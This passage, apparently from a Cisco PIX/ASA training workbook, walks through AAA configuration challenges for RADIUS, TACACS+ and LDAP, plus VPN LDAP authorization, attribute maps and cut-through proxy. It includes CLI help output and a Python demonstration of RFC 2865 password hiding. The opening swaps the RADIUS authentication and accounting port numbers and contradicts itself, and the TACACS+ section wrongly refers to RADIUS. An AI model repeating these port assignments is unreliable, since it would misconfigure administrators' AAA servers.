wireless systems. Microsoft RADIUS servers default to 1812 (accounting) and 1813
(authentication), but Cisco and Juniper RADIUS servers use default ports of 1645 (for
accounting) and 1646 (for authentication). RADIUS uses UDP over IP, and combines
authentication and authorization.
For the configuration, a group AAA server is defined initially:
(config)# aaa-server TEST protocol radius
(config-aaa-server-group)# max-failed-attempts 5
(config-aaa-server-group)# reactivation-mode depletion deadtime 10
(config-aaa-server-group)# exit

This defines a group name of TEST. Next the details of each of the servers in the group are
defined, such as for a single server host of:
(config)# aaa-server test (newyork) host 1.2.3.4
(config-aaa-server-host)# key testkey
(config-aaa-server-host)# authentication-port 1645
(config-aaa-server-host)# accounting-port 1646
(config-aaa-server-host)# retry-interval 10
(config-aaa-server-host)# exit

Which defines that the server is on the (newyork) interface, and has an address of 1.2.3.4.
With RADIUS a shared key is used, which is defined by the key command. This must be the
same as the key defined on the server. In this case the authentication and accounting ports
are defined as 1645 and 1646, respectively.
The main settings for RADIUS are:

Accounting-port. This is the port on which the RADIUS server listens for accounting
communications. Default = 1646.
Authorization-port. This is the port on which the RADIUS server listens for
authorization communications. Default = 1645.
Retry-interval. This is the time that the device waits for the RADIUS server to
respond before it tries again. Default = 10 seconds.
Timeout. This is the time that the device waits before it times out the
communications. Default = 10 seconds.
Key. This is the shared key that the device and the server use.
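What the shared key set with the key command actually protects: the RFC 2865 User-Password hiding a RADIUS client applies before sending an Access-Request, written in Python as an added example (not NetworkSims or Cisco code). The Request Authenticator is a fixed constructed value so the run is reproducible, and the key is the testkey from this challenge.

```python
"""RADIUS User-Password hiding (RFC 2865, section 5.2) and the server-side
check, to show why the key must match on both ends. Added example, not
NetworkSims or Cisco code; authenticator and secrets are constructed."""
import hashlib
import os


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def new_request_authenticator() -> bytes:
    """A real client draws a fresh 16-octet Request Authenticator per request."""
    return os.urandom(16)


def hide_password(password: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """Encode the User-Password attribute value sent in an Access-Request.

    The password is null-padded to a multiple of 16 octets; each block is
    XORed with MD5(secret + previous block), seeded with the Request
    Authenticator. Only a peer holding the same secret can undo it.
    """
    if len(authenticator) != 16:
        raise ValueError("Request Authenticator must be 16 octets")
    if not 1 <= len(password) <= 128:
        raise ValueError("RADIUS passwords are 1..128 octets")
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = bytearray(), authenticator
    for i in range(0, len(padded), 16):
        block = _xor(padded[i:i + 16], hashlib.md5(secret + prev).digest())
        out += block
        prev = block
    return bytes(out)


def reveal_password(hidden: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """Server-side inverse of hide_password; strips the null padding.

    Padding removal means a password with trailing null octets cannot be
    represented, which is a limitation of the attribute format itself.
    """
    if not hidden or len(hidden) % 16:
        raise ValueError("hidden password must be a non-empty multiple of 16 octets")
    out, prev = bytearray(), authenticator
    for i in range(0, len(hidden), 16):
        block = hidden[i:i + 16]
        out += _xor(block, hashlib.md5(secret + prev).digest())
        prev = block
    return bytes(out).rstrip(b"\x00")


def server_accepts(hidden: bytes, authenticator: bytes, server_secret: bytes,
                   expected_password: bytes) -> bool:
    """What the server does with the attribute: decode with its own copy of
    the key and compare. A key mismatch yields garbage, so the login fails
    even when the user typed the right password."""
    return reveal_password(hidden, server_secret, authenticator) == expected_password


# Constructed values: the key from this challenge and a fixed authenticator
# so the run is reproducible.
SHARED_KEY = b"testkey"
AUTHENTICATOR = bytes(range(16))

if __name__ == "__main__":
    hidden = hide_password(b"test", SHARED_KEY, AUTHENTICATOR)
    print("matching key accepted:  ", server_accepts(hidden, AUTHENTICATOR, SHARED_KEY, b"test"))
    print("mismatched key accepted:", server_accepts(hidden, AUTHENTICATOR, b"wrongkey", b"test"))
```

Because the hiding is only MD5 and XOR keyed by the shared secret, the secret's strength is all that protects the password on the wire, so the path between the firewall and the RADIUS server should itself be trusted or protected.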

Objectives
The objectives of this challenge are to:

Define an AAA group tag.
Define an AAA host.
Define AAA host details.

Commands
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif newyork
(config-if)# exit
(config)# aaa-server test protocol radius
(config-aaa-server-group)# max-failed-attempts 5
(config-aaa-server-group)# reactivation-mode depletion deadtime 10
(config-aaa-server-group)# exit
(config)# aaa-server test (newyork) host 1.2.3.4
(config-aaa-server-host)# key testkey
(config-aaa-server-host)# authentication-port 1645
(config-aaa-server-host)# accounting-port 1646
(config-aaa-server-host)# retry-interval 10
(config-aaa-server-host)# exit

Example
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif newyork
(config-if)# exit
pixfirewall(config)# aaa-server ?
configure mode commands/options:
WORD < 17 char Enter a AAA server group tag
pixfirewall(config)# aaa-server test ?
configure mode commands/options:
(                   Open parenthesis for the name of the network interface
                    where the designated AAA server is accessed
deadtime            Specify the amount of time that will elapse between the
                    disabling of the last server in the group and the
                    subsequent re-enabling of all servers
host                Enter this keyword to specify the IP address for the
                    server
max-failed-attempts Specify the maximum number of failures that will be
                    allowed for any server in the group before that server
                    is deactivated
protocol            Enter the protocol for a AAA server group
pixfirewall(config)# aaa-server test protocol ?
configure mode commands/options:
kerberos Protocol Kerberos
ldap     Protocol LDAP
nt       Protocol NT
radius   Protocol RADIUS
sdi      Protocol SDI
tacacs+  Protocol TACACS+
(config)# aaa-server test protocol radius
(config-aaa-server-group)# ?
AAA server configuration commands:
accounting-mode     Enter this keyword to specify accounting mode
exit                Exit from aaa-server group configuration mode
help                Help for AAA server configuration commands
max-failed-attempts Specify the maximum number of failures that will be
                    allowed for any server in the group before that server
                    is deactivated
no                  Remove an item from aaa-server group configuration
reactivation-mode   Specify the method by which failed servers are
                    reactivated
(config-aaa-server-group)# max-failed-attempts ?
aaa-server-group mode commands/options:
<1-5> Maximum number of failures (1-5)
(config-aaa-server-group)# reactivation-mode ?
aaa-server-group mode commands/options:
depletion Failed servers will remain inactive until all other servers in
          this group are inactive
timed     Failed servers will be reactivated after 30 seconds of down time
(config-aaa-server-group)# max-failed-attempts 5
(config-aaa-server-group)# reactivation-mode depletion deadtime 10
(config-aaa-server-group)# exit
(config)# aaa-server test ?
configure mode commands/options:
(                   Open parenthesis for the name of the network interface
                    where the designated AAA server is accessed
deadtime            Specify the amount of time that will elapse between the
                    disabling of the last server in the group and the
                    subsequent re-enabling of all servers
host                Enter this keyword to specify the IP address for the
                    server
max-failed-attempts Specify the maximum number of failures that will be
                    allowed for any server in the group before that server
                    is deactivated
protocol            Enter the protocol for a AAA server group
(config)# aaa-server test (newyork) ?
configure mode commands/options:
host Enter this keyword to specify the IP address for the server
(config)# aaa-server test (newyork) host ?
configure mode commands/options:
Hostname or A.B.C.D Enter an IP address or a name
WORD < 129 char     Enter a DNS name
(config)# aaa-server test (newyork) host 1.2.3.4 ?
configure mode commands/options:
WORD    Alphanumeric keyword up to 128 characters used as the encryption key
        for communicating with the AAA server.
timeout Specify the maximum time to wait for response from configured server
<cr>
(config)# aaa-server test (inside) host 1.2.3.4
(config-aaa-server-host)# ?
AAA server configuration commands:
accounting-port     Specify the port number to be used for accounting
acl-netmask-convert Specify the ACL Downloadable Netmask Operation
authentication-port Specify the port number to be used for authentication
exit                Exit from aaa-server host configuration mode
help                Help for AAA server configuration commands
key                 Specify the secret used to authenticate the NAS to the
                    AAA server
no                  Remove an item from aaa-server host configuration
radius-common-pw    Specify a common password for all RADIUS authorization
                    transactions
retry-interval      Specify the amount of time between retry attempts
timeout             Specify the maximum time to wait for response from
                    configured server
(config-aaa-server-host)# key ?
aaa-server-host mode commands/options:
WORD < 129 char Enter an alphanumeric string up to 128 characters
(config-aaa-server-host)# key testkey
(config-aaa-server-host)# accounting-port ?
aaa-server-host mode commands/options:
<0-65535> Enter port number (0 - 65535)
(config-aaa-server-host)# accounting-port 1646
(config-aaa-server-host)# authentication-port 1645
(config-aaa-server-host)# retry-interval ?
aaa-server-host mode commands/options:
<1-10> Number of seconds (1 - 10)
(config-aaa-server-host)# retry-interval 10

Cisco PIX/ASA Challenge 135


Title: Tacacs+ Authentication
Outline
The ASA/PIX device supports a wide range of AAA back ends, including RADIUS (Remote
Authentication Dial In User Service), Tacacs+, NT, LDAP, SDI and Kerberos. Tacacs+ uses
TCP over IP, and has separate elements for Authentication, Authorization and Accounting.
For the configuration, a group AAA server is defined initially:
(config)# aaa-server TEST protocol tacacs+
(config-aaa-server-group)# max-failed-attempts 5
(config-aaa-server-group)# reactivation-mode depletion deadtime 10
(config-aaa-server-group)# exit

This defines a group name of TEST. Next the details of each of the servers in the group are
defined, such as for a single server host of:
(config)# aaa-server test (newyork) host 1.2.3.4
(config-aaa-server-host)# key testkey
(config-aaa-server-host)# exit

Which defines that the server is on the (newyork) interface, and has an address of 1.2.3.4.
With RADIUS a shared key is used, which is defined by the key command. This must be the
same as the key defined on the server.
Objectives
The objectives of this challenge are to:

Define an AAA group tag.
Define an AAA host.
Define AAA host details.

Commands
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif newyork
(config-if)# exit
(config)# aaa-server TEST protocol tacacs+
(config-aaa-server-group)# max-failed-attempts 5
(config-aaa-server-group)# reactivation-mode depletion deadtime 10
(config-aaa-server-group)# exit
(config)# aaa-server test (newyork) host 1.2.3.4
(config-aaa-server-host)# key testkey
(config-aaa-server-host)# exit

Cisco PIX/ASA Challenge 136


Title: LDAP Authentication
Outline
The ASA/PIX device supports a wide range of AAA back ends, including Tacacs+, NT,
LDAP (Lightweight Directory Access Protocol), SDI and Kerberos. LDAP is a useful method
for authentication. LDAP is an application protocol that runs over TCP/IP and is used to
query and modify directory services; it can also be used for authentication.
For the configuration, a group AAA server is defined initially:
(config)# aaa-server TEST protocol ldap
(config-aaa-server-group)# max-failed-attempts 5
(config-aaa-server-group)# reactivation-mode depletion deadtime 10
(config-aaa-server-group)# exit

This defines a group name of TEST. Next the details of each of the servers in the group are
defined, such as for a single server host of:
(config)# aaa-server TEST (newyork) host 1.2.3.4
(config-aaa-server-host)# timeout 10
(config-aaa-server-host)# ldap-over-ssl enable
(config-aaa-server-host)# server-type Microsoft
(config-aaa-server-host)# sasl-mechanism digest-md5
(config-aaa-server-host)# exit

Which defines that the server is on the (newyork) interface, and has an address of 1.2.3.4.
With LDAP the main parameters which can be set are:

ldap-base-dn
ldap-defaults
ldap-dn
ldap-login-dn
ldap-login-password
ldap-naming-attribute
ldap-scope
timeout
server-port

For LDAP the PIX/ASA passes the user details to the LDAP server, by default, in plaintext
for both the username and the password. If this is seen as a security problem, the username
and password can be sent over an SSL connection using the ldap-over-ssl command. Also
the LDAP server type can be Sun, Microsoft or Auto-detect. This is defined with the
server-type command.
Objectives
The objectives of this challenge are to:

Define an AAA group tag for LDAP.
Define an AAA host.
Define AAA host details.
Define LDAP over SSL for secure username and password transmission.

Commands
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif newyork
(config-if)# exit
(config)# aaa-server TEST protocol ldap
(config-aaa-server-group)# exit
(config)# aaa-server test (newyork) host 1.2.3.4
(config-aaa-server-host)# timeout 10
(config-aaa-server-host)# ldap-over-ssl enable
(config-aaa-server-host)# server-type Microsoft
(config-aaa-server-host)# sasl-mechanism digest-md5
(config-aaa-server-host)# exit

Example
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif newyork
(config-if)# exit
(config)# aaa-server TEST protocol ldap
(config-aaa-server-group)# exit
(config)# aaa-server test (newyork) host 1.2.3.4
(config-aaa-server-host)# ?
AAA server configuration commands:
exit                  Exit from aaa-server host configuration mode
help                  Help for AAA server configuration commands
ldap-attribute-map    Specify the name of the LDAP attribute mapping table
ldap-base-dn          Specify the location to begin searching in the LDAP
                      hierarchy
ldap-login-dn         Specify the DN to be used to bind to the LDAP server
ldap-login-password   Specify password to be used to bind to the LDAP server
ldap-naming-attribute Specify the Relative Distinguished Name attribute that
                      uniquely identifies an entry on the LDAP server
ldap-over-ssl         Specify if an SSL connection is needed to the LDAP
                      server
ldap-scope            Specify the extent of the search in the LDAP hierarchy
no                    Remove an item from aaa-server host configuration
sasl-mechanism        Specify which authentication mechanism(s) to use with
                      the LDAP server
server-port           Specify the port number to be used for AAA operations
server-type           Specify the vendor of the LDAP server
timeout               Specify the maximum time to wait for response from
                      configured server
(config-aaa-server-host)# ldap-over-ssl ?
aaa-server-host mode commands/options:
enable Require an SSL connection to the LDAP server
(config-aaa-server-host)# ldap-over-ssl enable
(config-aaa-server-host)# server-type ?
aaa-server-host mode commands/options:
auto-detect Specify the vendor of the LDAP server is auto-detected
microsoft   Specify the vendor of the LDAP server is Microsoft
sun         Specify the vendor of the LDAP server is Sun
<external_if_name> is the External or postnat interface
(config-aaa-server-host)# server-type Microsoft
(config-aaa-server-host)# sasl-mechanism ?
aaa-server-host mode commands/options:
digest-md5 select Digest-MD5
kerberos   select Kerberos
configure mode commands/options:
permit Keyword for enabling this functionality
(config-aaa-server-host)# sasl-mechanism digest-md5
(config-aaa-server-host)# timeout 10
(config-aaa-server-host)# exit

Cisco PIX/ASA Challenge 137


Title: VPN Access with LDAP Authentication
Outline
LDAP can be used to authenticate users for VPN access; once a user has authenticated, the
PIX/ASA can also query the LDAP server for the user's attributes (authorization). To set up
LDAP authorization, a tunnel group is created and pointed at an AAA server group. For the
tunnel group:
(config)# tunnel-group TEST type ipsec-ra
(config)# tunnel-group TEST general-attributes
(config-general)# authorization-server-group LDAP1
(config-general)# exit

Where:

tunnel-group TEST type ipsec-ra defines a remote-access IPSec tunnel group named TEST.
authorization-server-group LDAP1 defines LDAP1 as the server group used for authorization
(authentication-server-group would name the group used to check the user's credentials).

Next the server group is defined, and the host is added to that same group:

(config)# aaa-server LDAP1 protocol ldap
(config-aaa-server-group)# exit
(config)# aaa-server LDAP1 (newyork) host 1.2.3.4
(config-aaa-server-host)# ldap-login-dn testing123
(config-aaa-server-host)# ldap-base-dn location123
(config-aaa-server-host)# ldap-scope subtree

Where:

ldap-scope subtree searches all the levels beneath the base DN (Distinguished
Name); onelevel searches only the level directly beneath it.
ldap-base-dn location123 defines location123 as the location to begin searching
in the LDAP hierarchy.
ldap-login-dn testing123 defines testing123 as the DN used to bind to the
LDAP server. testing123 and location123 are placeholders: a real deployment uses full
DNs (for example cn=asa-bind,ou=services,dc=example,dc=com and
ou=people,dc=example,dc=com) and also sets ldap-login-password, since an anonymous bind is
rarely allowed to search user entries. The bind account needs only read access to the
attributes the PIX/ASA looks up.

Objectives
The objectives of this challenge are to:

Define a tunnel group with attributes.
Define an AAA group tag for LDAP.
Define AAA host details.
Define LDAP details for VPN access.


Commands
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif newyork
(config-if)# exit
(config)# tunnel-group TEST type ipsec-ra
(config)# tunnel-group TEST general-attributes
(config-general)# authorization-server-group LDAP1
(config-general)# exit
(config)# aaa-server LDAP1 protocol ldap
(config-aaa-server-group)# exit
(config)# aaa-server LDAP1 (newyork) host 1.2.3.4
(config-aaa-server-host)# ldap-login-dn testing123
(config-aaa-server-host)# ldap-base-dn location123
(config-aaa-server-host)# ldap-scope subtree

Example
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif newyork
(config-if)# exit
(config)# tunnel-group ?
configure mode commands/options:
  WORD < 65 char  Enter the name of the tunnel group
(config)# tunnel-group TEST ?
configure mode commands/options:
  general-attributes  Enter the general-attributes sub command mode
  ipsec-attributes    Enter the ipsec-attributes sub command mode
  type                Enter the type of this group-policy
(config)# tunnel-group TEST type ?
configure mode commands/options:
  ipsec-l2l  IPSec Site to Site group
  ipsec-ra   IPSec Remote Access group
(config)# tunnel-group TEST type ipsec-ra
(config)# tunnel-group TEST general-attributes
(config-general)# ?
group_policy configuration commands:
  accounting-server-group      Enter name of the accounting server group
  address-pool                 Enter a list of address pools to assign
                               addresses from
  authentication-server-group  Enter name of the authentication server group
  authorization-server-group   Enter name of the authorization server group
  default-group-policy         Enter name of the default group policy
  dhcp-server                  Enter IP address or name of the DHCP server
  exit                         Exit from tunnel-group general attribute
                               configuration mode
  help                         Help for tunnel group configuration commands
  no                           Remove an attribute value pair
  strip-group                  Enable strip-group processing
  strip-realm                  Enable strip-realm processing
(config-general)# authorization-server-group ?
tunnel-group-general mode commands/options:
  WORD < 17 char  Name of authorization server group
(config-general)# authorization-server-group LDAP1
(config-general)# exit
(config)# aaa-server LDAP1 protocol ldap
(config-aaa-server-group)# exit
(config)# aaa-server LDAP1 (newyork) host 1.2.3.4
(config-aaa-server-host)# ldap-login-dn ?
aaa-server-host mode commands/options:
  LINE < 129 char  The DN used to bind to the LDAP server
(config-aaa-server-host)# ldap-login-dn testing123
(config-aaa-server-host)# ldap-base-dn ?
aaa-server-host mode commands/options:
  LINE < 129 char  The location to begin searching in the LDAP hierarchy
(config-aaa-server-host)# ldap-base-dn location123
(config-aaa-server-host)# ldap-scope ?
aaa-server-host mode commands/options:
  onelevel  Search only one level beneath the Base DN
  subtree   Search all levels beneath the Base DN
(config-aaa-server-host)# ldap-scope subtree

Cisco PIX/ASA Challenge 138


Title: LDAP Attribute Mapping
Outline
The attribute names (and values) that the PIX/ASA expects are usually not the ones held in
the LDAP directory, so an attribute map translates between them. map-name maps a directory
attribute name to a Cisco attribute name; map-value maps one value of that directory
attribute to the corresponding Cisco value. The map is then bound to the LDAP host with
ldap-attribute-map. The commands used are:
(config)# ldap attribute-map testing
(config-ldap-attribute-map)# map-name testing cVPN3000-WebVPN-URL-List
(config-ldap-attribute-map)# map-value testing DirValue CiscoValue
(config-ldap-attribute-map)# exit
(config)# aaa-server TEST (newyork) host 1.2.3.4
(config-aaa-server-host)# ldap-attribute-map testing

Here testing is both the name of the map and the name of the directory attribute being
mapped; DirValue and CiscoValue stand for a value as stored in the directory and the value
the PIX/ASA should see for it. Because mapped attributes drive authorization (ACLs, group
policy, simultaneous logins), only map directory attributes that ordinary users cannot
modify themselves.


Objectives
The objectives of this challenge are to:

Define an AAA group tag for LDAP.
Define AAA host details.
Define LDAP attributes.


Commands
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif newyork
(config-if)# exit
(config)# ldap attribute-map testing
(config-ldap-attribute-map)# map-name testing cVPN3000-WebVPN-URL-List
(config-ldap-attribute-map)# map-value testing DirValue CiscoValue
(config-ldap-attribute-map)# exit
(config)# aaa-server TEST protocol ldap
(config-aaa-server-group)# exit
(config)# aaa-server TEST (newyork) host 1.2.3.4
(config-aaa-server-host)# timeout 10
(config-aaa-server-host)# ldap-over-ssl enable
(config-aaa-server-host)# server-type microsoft
(config-aaa-server-host)# sasl-mechanism digest-md5
(config-aaa-server-host)# ldap-attribute-map testing
(config-aaa-server-host)# exit

Example
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif newyork
(config-if)# exit
(config)# aaa-server TEST protocol ldap
(config-aaa-server-group)# exit
(config)# aaa-server TEST (newyork) host 1.2.3.4
(config-aaa-server-host)# timeout 10
(config-aaa-server-host)# ldap-over-ssl enable
(config-aaa-server-host)# server-type microsoft
(config-aaa-server-host)# sasl-mechanism digest-md5
(config-aaa-server-host)# exit
(config)# ldap ?
configure mode commands/options:
  attribute-map  keyword
(config)# ldap attribute-map ?
configure mode commands/options:
  LINE < 64 char  Enter LDAP Mapping Name
(config)# ldap attribute-map testing
(config-ldap-attribute-map)# ?
LDAP commands:
  exit       Exit from LDAP Attribute configuration mode
  map-name   map-name configuration
  map-value  map-value configuration
  no         Remove a LDAP configuration
(config-ldap-attribute-map)# map-name ?
ldap mode commands/options:
  WORD  Enter Customer Attribute Name.
(config-ldap-attribute-map)# map-name testing ?
ldap mode commands/options:
cisco-attribute-names:
cVPN3000-Access-Hours
cVPN3000-Allow-Network-Extension-Mode
cVPN3000-Auth-Service-Type
cVPN3000-Authenticated-User-Idle-Timeout
cVPN3000-Authorization-Required
cVPN3000-Authorization-Type
cVPN3000-Cisco-AV-Pair
cVPN3000-Cisco-IP-Phone-Bypass
cVPN3000-Cisco-LEAP-Bypass
cVPN3000-Client-Intercept-DHCP-Configure-Msg
cVPN3000-Client-Type-Version-Limiting
cVPN3000-Confidence-Interval
cVPN3000-DHCP-Network-Scope
cVPN3000-DN-Field
cVPN3000-Firewall-ACL-In
cVPN3000-Firewall-ACL-Out
cVPN3000-IE-Proxy-Bypass-Local
cVPN3000-IE-Proxy-Exception-List
cVPN3000-IE-Proxy-Method
cVPN3000-IE-Proxy-Server
cVPN3000-IETF-Radius-Class
cVPN3000-IETF-Radius-Filter-Id
cVPN3000-IETF-Radius-Framed-IP-Address
cVPN3000-IETF-Radius-Framed-IP-Netmask
cVPN3000-IETF-Radius-Idle-Timeout
cVPN3000-IETF-Radius-Session-Timeout
cVPN3000-IKE-DPD-Retry-Interval
cVPN3000-IKE-Keep-Alives
cVPN3000-IPSec-Allow-Passwd-Store
cVPN3000-IPSec-Auth-On-Rekey
cVPN3000-IPSec-Authentication
cVPN3000-IPSec-Backup-Server-List
cVPN3000-IPSec-Backup-Servers
cVPN3000-IPSec-Banner1
cVPN3000-IPSec-Banner2
cVPN3000-IPSec-Client-Firewall-Filter-Name
cVPN3000-IPSec-Client-Firewall-Filter-Optional
cVPN3000-IPSec-Default-Domain
cVPN3000-IPSec-IKE-Peer-ID-Check
cVPN3000-IPSec-IP-Compression
cVPN3000-IPSec-Mode-Config
cVPN3000-IPSec-Over-UDP
cVPN3000-IPSec-Over-UDP-Port
cVPN3000-IPSec-Required-Client-Firewall-Capability
cVPN3000-IPSec-Sec-Association
cVPN3000-IPSec-Split-DNS-Names
cVPN3000-IPSec-Split-Tunnel-List
cVPN3000-IPSec-Split-Tunneling-Policy
cVPN3000-IPSec-Tunnel-Type
cVPN3000-IPSec-User-Group-Lock
cVPN3000-L2TP-Encryption
cVPN3000-L2TP-MPPC-Compression
cVPN3000-LDAP-Base-DN
cVPN3000-LDAP-CRL-Data
cVPN3000-LDAP-Filter
cVPN3000-LDAP-Host-Name
cVPN3000-LDAP-Host-Port
cVPN3000-LDAP-Login
cVPN3000-LDAP-Password
cVPN3000-LDAP-Request-Type
cVPN3000-LDAP-Scope
cVPN3000-LDAP-Version
cVPN3000-MS-Client-Subnet-Mask
cVPN3000-PFS-Required
cVPN3000-PPTP-Encryption
cVPN3000-PPTP-MPPC-Compression
cVPN3000-Primary-DNS
cVPN3000-Primary-WINS
cVPN3000-Require-HW-Client-Auth
cVPN3000-Require-Individual-User-Auth
cVPN3000-Required-Client-Firewall-Description
cVPN3000-Required-Client-Firewall-Product-Code
cVPN3000-Required-Client-Firewall-Vendor-Code
cVPN3000-SEP-Card-Assignment
cVPN3000-Secondary-DNS
cVPN3000-Secondary-WINS
cVPN3000-Simultaneous-Logins
cVPN3000-Strip-Realm
cVPN3000-TACACS-Authtype
cVPN3000-TACACS-Privilege-Level
cVPN3000-Tunnel-Group-Lock
cVPN3000-Tunneling-Protocols
cVPN3000-Use-Client-Address
cVPN3000-User-Auth-Server-Name
cVPN3000-User-Auth-Server-Port
cVPN3000-User-Auth-Server-Secret
cVPN3000-WebVPN-ACL-Filters
cVPN3000-WebVPN-Apply-ACL-Enable
cVPN3000-WebVPN-Citrix-Support-Enable
cVPN3000-WebVPN-Content-Filter-Parameters
cVPN3000-WebVPN-Enable-Functions
cVPN3000-WebVPN-Exchange-NETBIOS-Name
cVPN3000-WebVPN-Exchange-Server-Address
cVPN3000-WebVPN-File-Access-Enable
cVPN3000-WebVPN-File-Server-Browsing-Enable
cVPN3000-WebVPN-File-Server-Entry-Enable
cVPN3000-WebVPN-Forwarded-Ports
cVPN3000-WebVPN-Homepage
cVPN3000-WebVPN-Port-Forwarding-Auto-Download-Enable
cVPN3000-WebVPN-Port-Forwarding-Enable
cVPN3000-WebVPN-Port-Forwarding-Exchange-Proxy-Enable
cVPN3000-WebVPN-Port-Forwarding-HTTP-Proxy-Enable
cVPN3000-WebVPN-Port-Forwarding-Name
cVPN3000-WebVPN-SVC-Client-DPD
cVPN3000-WebVPN-SVC-Compression
cVPN3000-WebVPN-SVC-Enable
cVPN3000-WebVPN-SVC-Gateway-DPD
cVPN3000-WebVPN-SVC-Keep-Enable
cVPN3000-WebVPN-SVC-Keepalive
cVPN3000-WebVPN-SVC-Rekey-Method
cVPN3000-WebVPN-SVC-Rekey-Period
cVPN3000-WebVPN-SVC-Required-Enable
cVPN3000-WebVPN-Single-Sign-On-Server-Name
cVPN3000-WebVPN-URL-Entry-Enable
cVPN3000-WebVPN-URL-List
cVPN3000-X509-Cert-Data
(config-ldap-attribute-map)# map-name testing cVPN3000-WebVPN-URL-List
(config-ldap-attribute-map)# map-value ?
ldap mode commands/options:
customer-attribute-names:
(config-ldap-attribute-map)# map-value testing DirValue CiscoValue
(config-ldap-attribute-map)# exit
(config)# aaa-server TEST (newyork) host 1.2.3.4
(config-aaa-server-host)# ldap-attribute-map testing
(config-aaa-server-host)# exit

Cisco PIX/ASA Challenge 139


Title: Using AAA for End-user Cut-through Proxy Applications
Outline
The PIX/ASA can authenticate users before they make connections. Once a user has
authenticated, the result is cached, so that later connections from that host do not need a
fresh exchange with the authentication server. The PIX/ASA thus acts as an authentication
proxy, and the commands which trigger the authentication take the form:
(config)# aaa authentication include telnet outside 0 0 0 0 SERVERTAG
(config)# aaa authentication include ssh outside 0 0 0 0 SERVERTAG
(config)# aaa authentication include ftp outside 0 0 0 0 SERVERTAG
(config)# aaa authentication include http outside 0 0 0 0 SERVERTAG
(config)# aaa authentication include https outside 0 0 0 0 SERVERTAG

which authenticate all Telnet, SSH, FTP, HTTP and HTTPS connections arriving on the outside
interface, for all local and foreign addresses (the four zeros are local address, local
mask, foreign address and foreign mask, where 0 is the same as 0.0.0.0). Only Telnet, FTP,
HTTP and HTTPS can prompt the user for credentials; for any other service the user must
already hold a cached authentication obtained through one of those. Telnet, FTP and HTTP
send those credentials in cleartext, so prefer HTTPS (or aaa authentication
secure-http-client) where the client can use it. In this case SERVERTAG is the tag that
names the authentication server group, such as:
(config)# aaa-server SERVERTAG (inside) host 1.2.3.4

Objectives
The objectives of this challenge are to:

Define an end-user cut-through proxy for various protocols.
Define AAA host details.

Commands
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif newyork
(config-if)# exit
(config)# aaa-server SERVERTAG protocol radius
(config-aaa-server-group)# exit
(config)# aaa-server SERVERTAG (newyork) host 1.2.3.4
(config-aaa-server-host)# key testkey
(config-aaa-server-host)# exit
(config)# aaa authentication include telnet newyork 0 0 0 0 SERVERTAG
(config)# aaa authentication include ssh newyork 0 0 0 0 SERVERTAG
(config)# aaa authentication include ftp newyork 0 0 0 0 SERVERTAG
(config)# aaa authentication include http newyork 0 0 0 0 SERVERTAG
(config)# aaa authentication include https newyork 0 0 0 0 SERVERTAG

Example
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif newyork
(config-if)# exit
(config)# aaa-server SERVERTAG protocol radius
(config-aaa-server-group)# exit
(config)# aaa-server SERVERTAG (newyork) host 1.2.3.4
(config-aaa-server-host)# key testkey
(config-aaa-server-host)# exit
(config)# aaa authentication ?
configure mode commands/options:
  command  Specify this keyword to allow command authorization to be configured
           for all administrators on all consoles
  exclude  Exclude the service, local and foreign network which needs to be
           authenticated, authorized, and accounted
  include  Include the service, local and foreign network which needs to be
           authenticated, authorized, and accounted
  match    Specify this keyword to configure an ACL to match
(config)# aaa authentication include ?
configure mode commands/options:
  WORD    Specify <protocol>[/<port>] as the service to be authorized or
          accounted
  any     Specify all TCP as the service to be authenticated, authorized or
          accounted
  ftp     Specify FTP as the service to be authenticated, authorized or
          accounted
  http    Specify HTTP as the service to be authenticated, authorized or
          accounted
  https   Specify HTTPS as the service to be authenticated, authorized or
          accounted
  icmp/   Specify icmp/<port> as the service to be authorized or accounted
  ssh     Specify SSH as the service to be authenticated, authorized or
          accounted
  tcp/    Specify tcp/<port> as the service to be authenticated, authorized or
          accounted
  tcp/0   Specify all TCP as the service to be authenticated, authorized or
          accounted
  telnet  Specify telnet as the service to be authenticated, authorized or
          accounted
  udp/    Specify udp/<port> as the service to be authorized or accounted
(config)# aaa authentication include telnet ?
configure mode commands/options:
Current available interface(s):
  newyork  Name of interface Ethernet0
(config)# aaa authentication include telnet newyork ?
configure mode commands/options:
  Hostname or A.B.C.D  The address and mask of the local/internal host which is
                       source or destination for connections requiring
                       authentication
(config)# aaa authentication include telnet newyork 0 ?
configure mode commands/options:
  A.B.C.D  Network mask to apply to <local ip address>
(config)# aaa authentication include telnet newyork 0 0 ?
configure mode commands/options:
  Hostname or A.B.C.D  The address and mask of the foreign host which is either
                       source or destination for connections requiring
                       authentication
  WORD                 Specify name of server group defined by the aaa-server
                       command.
(config)# aaa authentication include telnet newyork 0 0 0 ?
configure mode commands/options:
  A.B.C.D  Network mask to apply to <foreign ip address>
(config)# aaa authentication include telnet newyork 0 0 0 0 ?
configure mode commands/options:
  WORD  Specify name of server group defined by the aaa-server command.
(config)# aaa authentication include telnet newyork 0 0 0 0 SERVERTAG ?
configure mode commands/options:
  <cr>
(config)# aaa authentication include telnet newyork 0 0 0 0 SERVERTAG
(config)# aaa authentication include ssh newyork 0 0 0 0 SERVERTAG
(config)# aaa authentication include ftp newyork 0 0 0 0 SERVERTAG
(config)# aaa authentication include http newyork 0 0 0 0 SERVERTAG
(config)# aaa authentication include https newyork 0 0 0 0 SERVERTAG

Cisco PIX/ASA Challenge 140


Title: AAA for End-user Cut-through Proxy Applications using an ACL
Outline
The PIX/ASA can authenticate users before they make connections. In the previous
challenge the traffic to authenticate was selected by protocol, such as:
